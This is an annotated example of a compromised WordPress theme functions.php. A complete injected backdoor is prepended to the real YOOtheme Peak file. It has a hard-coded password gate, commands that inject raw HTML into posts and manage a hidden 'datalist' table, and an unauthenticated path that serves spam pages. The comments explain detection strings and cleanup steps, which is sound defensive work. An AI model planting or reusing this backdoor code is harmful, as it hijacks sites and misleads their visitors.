Example of a compromised functions.php (injected backdoor code prepended to a theme file)
<?php | |
// Everything from here down to the `?><?php` splice near the bottom is NOT part of the theme:
// it is an injected block that was prepended to the theme's real functions.php (the YOOtheme
// Peak header further down is where the original file starts). Because WordPress includes the
// active theme's functions.php on every front-end request, this code runs before any template.
//
// Access gate. $_REQUEST merges GET, POST and COOKIE, so a request arriving by any of those
// carrying an `action` plus a `password` equal to the hard-coded 32-hex-character literal is
// let through. There is no capability check, no nonce and no logging; the literal is compared
// directly against the submitted value, so it behaves as a plaintext shared secret known to
// whoever planted the file. The literal, `wp_cd_code`, the `datalist` table name and the
// `ERROR_WP_ACTION WP_URL_CD` marker below are all dependable strings to search for when
// sweeping theme/plugin files for this family. Loose `==` is used for the comparison.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '7aa4ec0ada577823232adaa56b233f8b')) | |
{ | |
// Command dispatcher. The `case 'x';` form (semicolon instead of colon) is legal PHP but
// unusual enough to stand out in a code review of theme files.
switch ($_REQUEST['action']) | |
{ | |
// 'get_all_links': enumerates every published post and prints, per post, its guid, its ID and
// whatever currently sits inside a `<div id="wp_cd_code">...</div>` in post_content. This gives
// the operator an inventory of which posts already carry an injected block. Each record is a
// bespoke `<e><w>1</w><url/><code/><id/></e>` line -- another grep-able signature.
case 'get_all_links'; | |
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) | |
{ | |
$data['code'] = ''; | |
// `$_` is a throwaway capture array; `$_[1]` is the inner HTML of the wp_cd_code div.
if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)) | |
{ | |
$data['code'] = $_[1]; | |
} | |
print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n"; | |
} | |
break; | |
// 'set_id_links': rewrites post_content of the post selected by `id`. Any existing wp_cd_code
// div is stripped, then (if `data` is non-empty) a new one holding the raw request payload is
// appended. This is the content-injection primitive: unfiltered HTML from the request is
// stored in wp_posts and will be emitted wherever that post is rendered.
// Escaping relies on mysql_escape_string(), which was deprecated in PHP 5.3 and removed with
// ext/mysql in PHP 7.0, so on a current PHP this branch fatals instead of running; the mere
// presence of that function is a strong hint the code is foreign to the theme. $wpdb->prepare()
// is never used in this file.
case 'set_id_links'; | |
if (isset($_REQUEST['data'])) | |
{ | |
$data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"'); | |
$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content); | |
// stripcslashes() only undoes C-style escaping; nothing is passed through wp_kses() or any
// other filter, so the stored HTML is exactly what the client sent.
if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>'; | |
// Direct UPDATE that touches only post_content: post_modified is left alone and wp_update_post()
// is bypassed, so the edit most likely leaves no trace in the post's revision history.
if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false) | |
{ | |
print "true"; | |
} | |
} | |
break; | |
// 'create_page': manages rows in a `{prefix}datalist` table. That is not a WordPress core table
// and its creation is not shown here, so during cleanup look for it in the database and for the
// code that created it. `remove_page` deletes the row for `url`; otherwise a row keyed by `url`
// is inserted/updated with request-supplied title, keywords, description, content and
// full_content. These rows are the pages served by the unauthenticated block after the switch.
case 'create_page'; | |
if (isset($_REQUEST['remove_page'])) | |
{ | |
if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"')) | |
{ | |
print "true"; | |
} | |
} | |
// `isset(...) && !empty(...)`: the isset is redundant, empty() already tolerates a missing key.
elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content'])) | |
{ | |
// Asymmetry worth noting: the INSERT stores `content` verbatim while the ON DUPLICATE KEY UPDATE
// stores urldecode(content). Whether that is deliberate cannot be told from this file.
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"')) | |
{ | |
print "true"; | |
} | |
} | |
break; | |
// Fixed error marker returned for an unknown action; a reliable indicator string for file and
// log searches.
default: print "ERROR_WP_ACTION WP_URL_CD"; | |
} | |
// Ends the request here, so WordPress renders nothing else for a command call.
die(""); | |
} | |
// Unauthenticated serving path, evaluated on EVERY front-end request. If the raw REQUEST_URI
// matches a stored `url` in `{prefix}datalist`, the stored page is printed instead of the real
// one and the request exits before the theme's templates run. Visitors and crawlers therefore
// receive operator-authored pages under the site's own domain (the robots meta below asks for
// indexing, which is consistent with search-spam / doorway-page use). REQUEST_URI reaches the
// query via mysql_escape_string() only; `== '1'` is a loose compare of the COUNT(*) result.
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' ) | |
{ | |
$data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"'); | |
// full_content set: emit the stored body as-is (a complete document was supplied).
if ($data -> full_content) | |
{ | |
print stripslashes($data -> content); | |
} | |
else | |
{ | |
// Otherwise wrap the stored fragment in a minimal HTML skeleton assembled from the site's own
// theme hooks (language_attributes, bloginfo, wp_head, search form, sidebar, footer) so the
// page looks like a legitimate one. title/keywords/description go through stripslashes() only,
// with no htmlspecialchars(), so they are emitted unescaped into markup and attributes.
print '<!DOCTYPE html>'; | |
print '<html '; | |
language_attributes(); | |
print ' class="no-js">'; | |
print '<head>'; | |
print '<title>'.stripslashes($data -> title).'</title>'; | |
print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />'; | |
print '<meta name="Description" content="'.stripslashes($data -> description).'" />'; | |
print '<meta name="robots" content="index, follow" />'; | |
print '<meta charset="'; | |
bloginfo( 'charset' ); | |
print '" />'; | |
print '<meta name="viewport" content="width=device-width">'; | |
print '<link rel="profile" href="http://gmpg.org/xfn/11">'; | |
print '<link rel="pingback" href="'; | |
bloginfo( 'pingback_url' ); | |
print '">'; | |
wp_head(); | |
print '</head>'; | |
print '<body>'; | |
print '<div id="content" class="site-content">'; | |
print stripslashes($data -> content); | |
get_search_form(); | |
get_sidebar(); | |
get_footer(); | |
} | |
// Hard exit: none of the real theme executes for a matched URL.
exit; | |
} | |
// Splice point. `?><?php` closes the injected block and re-opens PHP for the theme's original
// file, whose header follows. Remediation is to remove everything above this line, compare the
// remainder (and the rest of the theme) against a pristine copy, inspect/drop the `datalist`
// table, search wp_posts for `wp_cd_code` divs, review access logs for front-end requests
// carrying `action`/`password` parameters, and rotate credentials that the planter may have held.
?><?php | |
/** | |
* @package Peak | |
* @author YOOtheme http://www.yootheme.com | |
* @copyright Copyright (C) YOOtheme GmbH | |
* @license http://www.gnu.org/licenses/gpl.html GNU/GPL | |
*/ | |
// check compatibility | |
if (version_compare(PHP_VERSION, '5.3', '>=')) { | |
// bootstrap warp | |
require(__DIR__.'/warp.php'); | |
} |